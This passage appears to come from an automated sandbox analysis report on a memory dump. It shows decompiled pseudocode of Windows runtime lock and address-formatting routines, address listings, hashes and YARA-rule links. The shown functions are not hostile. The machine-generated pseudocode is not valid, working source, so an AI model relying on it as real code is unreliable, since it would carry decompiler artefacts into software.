                                                0x009ceb27
                                                0x00000000
                                                0x00000000
                                                0x009ceb36
                                                0x00000000
                                                0x009ceb36
                                                0x009a0bea
                                                0x00000000
                                                0x00000000
                                                0x009a0bf6
                                                0x009a0c00
                                                0x009a0c03
                                                0x009a0c0b
                                                0x00000000
                                                0x009a0c0b
                                                0x009ceaaa
                                                0x00000000
                                                0x009a0a15
                                                0x009a0bb6
                                                0x00000000
                                                0x009a0bc6
                                                0x009a0bc6
                                                0x009a0bcb
                                                0x009a0c15
                                                0x00000000
                                                0x00000000
                                                0x009a0c1d
                                                0x009a0c20
                                                0x009a0c21
                                                0x009a0c24
                                                0x009a0c24
                                                0x009a0c26
                                                0x00000000
                                                0x009a0c26
                                                0x009a0bcd
                                                0x00000000
                                                0x009a0bcd
                                                0x009a0b89
                                                0x009a0b89
                                                0x009a0b90
                                                0x00000000
                                                0x00000000
                                                0x009a0b96
                                                0x00000000
                                                0x009a0b96
                                                0x009a0a04
                                                0x009a0a04
                                                0x009a0b9a
                                                0x009a0b9a
                                                0x009a0b9b
                                                0x009a0b9f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009a0ba5
                                                0x009a0ac7
                                                0x009a0aca
                                                0x009ceacf
                                                0x00000000
                                                0x009ceade
                                                0x009ceade
                                                0x009ceae3
                                                0x00000000
                                                0x00000000
                                                0x009ceaf3
                                                0x009ceaf6
                                                0x009ceaf7
                                                0x009ceafe
                                                0x009ceb01
                                                0x00000000
                                                0x009ceb01
                                                0x009ceacf
                                                0x009a0ad0
                                                0x009a0ad4
                                                0x00000000
                                                0x00000000
                                                0x009a0ada
                                                0x009a0ae6
                                                0x009a0c34
                                                0x00000000
                                                0x009a0c47
                                                0x009a0c49
                                                0x009a0c4a
                                                0x009a0c4e
                                                0x009a0c51
                                                0x009a0c54
                                                0x009a0c57
                                                0x009a0c5a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009a0c60
                                                0x009a0afb
                                                0x009a0afe
                                                0x009a0b02
                                                0x009a0b05
                                                0x009a0b08
                                                0x00000000
                                                0x009a0b08
                                                0x009a0ae6
                                                0x009a0b44
                                                0x009a09f8
                                                0x009a09f8
                                                0x009a09f9
                                                0x00000000
                                                0x00000000
                                                0x009ceaa0
                                                0x00000000

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: __fassign
                                                • String ID: .$:$:
                                                • API String ID: 3965848254-2308638275
                                                • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                • Instruction ID: 19c1ec905c210dba7371f8f66241b5c283b271470cc11a27a5b371000b011617
                                                • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                • Instruction Fuzzy Hash: 17A19E71D0030AEFDF24CF64C8457BEB7B8AF96314F24856AD892A7282D7349A41CBD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009A0554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 49%
                                                			E009A0554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00a401c0;
									_push(_t144);
									_push(0);
									_t51 = E0095F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E009A4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E009B3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E009B3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E009E217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E009B3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E009A3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00a401c0;
												_push(_t138);
												_push(0);
												_t58 = E0095F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E009A4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E009B3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E009B3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E009E217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E009B3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E009A3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00985384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0095F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E009A3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0095F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E009A3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0095F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E009A3915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E00985329(_t110, _t138);
																return E009853A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}



































                                                0x009a055a
                                                0x009a055d
                                                0x009a0563
                                                0x009a0566
                                                0x009a05d8
                                                0x009a05e2
                                                0x009a05e5
                                                0x00000000
                                                0x009a05e7
                                                0x009a05e7
                                                0x009a05ea
                                                0x009a05f3
                                                0x009a05f3
                                                0x009a0568
                                                0x009a0568
                                                0x009a0568
                                                0x009a0569
                                                0x009a0569
                                                0x009a0569
                                                0x009a056b
                                                0x00000000
                                                0x00000000
                                                0x009c217f
                                                0x009c2183
                                                0x009c225b
                                                0x009c225f
                                                0x009c2189
                                                0x009c218c
                                                0x009c218f
                                                0x009c2194
                                                0x009c2199
                                                0x009c219d
                                                0x009c21a0
                                                0x009c21a2
                                                0x009c21ce
                                                0x009c21ce
                                                0x009c21ce
                                                0x009c21d0
                                                0x009c21d6
                                                0x009c21de
                                                0x009c21e2
                                                0x009c21e8
                                                0x009c21e9
                                                0x009c21ec
                                                0x009c21f1
                                                0x009c21f6
                                                0x00000000
                                                0x00000000
                                                0x009c21f8
                                                0x009c21fb
                                                0x009c2206
                                                0x009c220b
                                                0x009c220c
                                                0x009c2217
                                                0x009c2226
                                                0x009c222b
                                                0x009c222c
                                                0x009c222f
                                                0x009c2232
                                                0x009c2235
                                                0x009c2235
                                                0x009c223a
                                                0x009c223f
                                                0x009c2241
                                                0x009c2243
                                                0x009c2248
                                                0x009c2248
                                                0x009c224d
                                                0x009c224f
                                                0x009c2262
                                                0x009c2263
                                                0x009c2268
                                                0x009c2269
                                                0x009c2269
                                                0x009c2269
                                                0x009c226d
                                                0x00000000
                                                0x00000000
                                                0x009c2276
                                                0x009c2279
                                                0x009c227e
                                                0x009c2283
                                                0x009c2287
                                                0x009c228a
                                                0x009c228d
                                                0x009c228f
                                                0x009c22bc
                                                0x009c22bc
                                                0x009c22bc
                                                0x009c22be
                                                0x009c22c4
                                                0x009c22cc
                                                0x009c22d0
                                                0x009c22d6
                                                0x009c22d7
                                                0x009c22da
                                                0x009c22df
                                                0x009c22e4
                                                0x00000000
                                                0x00000000
                                                0x009c22e6
                                                0x009c22e9
                                                0x009c22f4
                                                0x009c22f9
                                                0x009c22fa
                                                0x009c2305
                                                0x009c2314
                                                0x009c2319
                                                0x009c231a
                                                0x009c231d
                                                0x009c2320
                                                0x009c2323
                                                0x009c2323
                                                0x009c2328
                                                0x009c232d
                                                0x009c232f
                                                0x009c2331
                                                0x009c2336
                                                0x009c2336
                                                0x009c233b
                                                0x009c233d
                                                0x009c2350
                                                0x009c2351
                                                0x009c2356
                                                0x009c2359
                                                0x009c2359
                                                0x009c235b
                                                0x009c235d
                                                0x00985367
                                                0x0098536b
                                                0x00985372
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009c2363
                                                0x009c2363
                                                0x009c2369
                                                0x009c236a
                                                0x009c236c
                                                0x009c2371
                                                0x009c2373
                                                0x00000000
                                                0x009c2379
                                                0x009c2379
                                                0x009c237a
                                                0x009c237f
                                                0x009c237f
                                                0x009c2385
                                                0x009c2386
                                                0x009c2389
                                                0x009c238e
                                                0x009c2390
                                                0x00985378
                                                0x0098537c
                                                0x009c2396
                                                0x009c2396
                                                0x009c2397
                                                0x009c239c
                                                0x009c23a2
                                                0x009c23a3
                                                0x009c23a6
                                                0x009c23ab
                                                0x009c23ad
                                                0x00000000
                                                0x009c23b3
                                                0x009c23b3
                                                0x009c23b4
                                                0x009c23b9
                                                0x009c23ba
                                                0x009c23ba
                                                0x009c23bc
                                                0x009c23bf
                                                0x00000000
                                                0x00000000
                                                0x009b9153
                                                0x009b9158
                                                0x009b915a
                                                0x009b915e
                                                0x009b9160
                                                0x00000000
                                                0x009b9166
                                                0x009b9166
                                                0x009b9171
                                                0x009b9176
                                                0x009b9176
                                                0x00000000
                                                0x009b9160
                                                0x009c23c6
                                                0x009c23d7
                                                0x009c23d7
                                                0x009c23ad
                                                0x009c2390
                                                0x009c2373
                                                0x009c233f
                                                0x009c233f
                                                0x00000000
                                                0x009c233f
                                                0x009c2291
                                                0x009c2291
                                                0x009c2293
                                                0x009c2295
                                                0x009c229a
                                                0x009c22a1
                                                0x009c22a3
                                                0x009c22a7
                                                0x009c22a9
                                                0x00000000
                                                0x00000000
                                                0x009c22ab
                                                0x009c22ad
                                                0x009c22af
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009c22af
                                                0x009c22b1
                                                0x009c22b4
                                                0x009c22b4
                                                0x009c22b6
                                                0x009853be
                                                0x009853be
                                                0x009853be
                                                0x009853c0
                                                0x00000000
                                                0x00000000
                                                0x009853cb
                                                0x009853ce
                                                0x009853d0
                                                0x009853d4
                                                0x009853d6
                                                0x00000000
                                                0x009853d8
                                                0x009853e3
                                                0x009853ea
                                                0x009853ea
                                                0x00000000
                                                0x009853d6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009c22b6
                                                0x00000000
                                                0x009c228f
                                                0x009c2349
                                                0x009c234d
                                                0x009c2251
                                                0x009c2251
                                                0x00000000
                                                0x009c2251
                                                0x009c21a4
                                                0x009c21a4
                                                0x009c21a6
                                                0x009c21a8
                                                0x009c21ac
                                                0x009c21b6
                                                0x009c21b8
                                                0x009c21bc
                                                0x009c21be
                                                0x00000000
                                                0x00000000
                                                0x009c21c0
                                                0x009c21c2
                                                0x009c21c4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009c21c4
                                                0x009c21c6
                                                0x009c21c6
                                                0x009c21c8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009c21c8
                                                0x009c21a2
                                                0x00000000
                                                0x009c2183
                                                0x009a057b
                                                0x009a057d
                                                0x009a0581
                                                0x009a0583
                                                0x009c2178
                                                0x00000000
                                                0x009a0589
                                                0x009a058f
                                                0x009a058f
                                                0x009a0583
                                                0x00000000

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009C2206
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-4236105082
                                                • Opcode ID: 2fdd6a20e395bda0fb9ae5ae99df20b9864aa2bbd5de9e0ee5ed67ccf3c25f90
                                                • Instruction ID: ee8ff7339e75f96c011b71acd0b669d87ac322bb7a2df781e91eaa2576f67882
                                                • Opcode Fuzzy Hash: 2fdd6a20e395bda0fb9ae5ae99df20b9864aa2bbd5de9e0ee5ed67ccf3c25f90
                                                • Instruction Fuzzy Hash: DC514631B442016FEB15CB19CC82FA633ADAFD5720F25822DFD59DB286DA35EC418B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009A14C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 64%
                                                			E009A14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0xa42088; // 0x75f650f4
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00997707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E009A13CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00997707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00997707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00962340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0096E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                0x009a14c0
                                                0x009a14cb
                                                0x009a14d2
                                                0x009a14d6
                                                0x009a14da
                                                0x009a14de
                                                0x009a14e3
                                                0x009a157a
                                                0x009a157a
                                                0x009a14f1
                                                0x009a14f3
                                                0x009cea0f
                                                0x00000000
                                                0x009cea15
                                                0x00000000
                                                0x009cea15
                                                0x009a14f9
                                                0x009a14f9
                                                0x009a14fe
                                                0x009a1504
                                                0x009cea1a
                                                0x009cea1f
                                                0x009cea21
                                                0x009cea22
                                                0x009cea27
                                                0x009cea2a
                                                0x009cea2a
                                                0x009a1515
                                                0x009a1517
                                                0x009a156d
                                                0x009a1572
                                                0x009a1575
                                                0x009a1575
                                                0x009a151e
                                                0x009cea50
                                                0x009cea55
                                                0x009cea58
                                                0x009cea58
                                                0x009a152e
                                                0x009a1531
                                                0x009a1533
                                                0x00000000
                                                0x009a1535
                                                0x009a1541
                                                0x009a1549
                                                0x009a1549
                                                0x009a1533
                                                0x009a14f3
                                                0x009a1559

                                                APIs
                                                • ___swprintf_l.LIBCMT ref: 009CEA22
                                                  • Part of subcall function 009A13CB: ___swprintf_l.LIBCMT ref: 009A146B
                                                  • Part of subcall function 009A13CB: ___swprintf_l.LIBCMT ref: 009A1490
                                                • ___swprintf_l.LIBCMT ref: 009A156D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: bf408b586b2424854d2e25ff2059d0e630e318ce4dc58a086a32b8496d037699
                                                • Instruction ID: 4b0e5b8423cbd801a9ffbf5b61b07a893185394e5eef05ecac15c206bb4a008e
                                                • Opcode Fuzzy Hash: bf408b586b2424854d2e25ff2059d0e630e318ce4dc58a086a32b8496d037699
                                                • Instruction Fuzzy Hash: F0219172D00219AFCF21DE98CC41BEAB3ACAB95710F444565FC46D3140DB74EA588BE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009853A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                Download Yara Rule
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009C22F4
                                                Strings
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009C22FC
                                                • RTL: Resource at %p, xrefs: 009C230B
                                                • RTL: Re-Waiting, xrefs: 009C2328
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-871070163
                                                • Opcode ID: 4fb87f34b410594d901478e7fd91d4e8e9d8e5739116e207f172a2db5380423f
                                                • Instruction ID: b041027db05407bc7f7ad35f2c5f81615f61308bca5b523902f5e54c67f0ff89
                                                • Opcode Fuzzy Hash: 4fb87f34b410594d901478e7fd91d4e8e9d8e5739116e207f172a2db5380423f
                                                • Instruction Fuzzy Hash: AE515671A00701ABEB15EB28CC81FA7339CAFD5760F11422AFD19CB281EA74EC4587E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0098EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                Download Yara Rule
                                                Strings
                                                • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 009C24BD
                                                • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 009C248D
                                                • RTL: Re-Waiting, xrefs: 009C24FA
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                • API String ID: 0-3177188983
                                                • Opcode ID: ea6d2248df0375a06848bee3cf2ecb441571b865c640ec386e8ab47a86b1c9d5
                                                • Instruction ID: 16abb3a5f17846f9f0263899611f7746e4d1ad7d111184efa7103692e4948e63
                                                • Opcode Fuzzy Hash: ea6d2248df0375a06848bee3cf2ecb441571b865c640ec386e8ab47a86b1c9d5
                                                • Instruction Fuzzy Hash: D041E670A00204ABD724EFA9CC99FAB77A8EFC5720F208A19F5559B3D1D734E94187A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0099FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: __fassign
                                                • String ID:
                                                • API String ID: 3965848254-0
                                                • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                • Instruction ID: 37ec77aa07be603a98bbf8bb6b77a1d0c5034cb92a9936484ba851af09907f86
                                                • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                • Instruction Fuzzy Hash: 41919F72D0420AEBDF24CF9CC855BEEB7B8EF55305F24847AD452E61A2E7304A41CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Analysis Process: msiexec.exe PID: 2004 Parent PID: 1764 msiexec.exeCOMMON

                                                Executed Functions

                                                Function 0012A35A, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70filenativeCOMMON
                                                Download Yara Rule
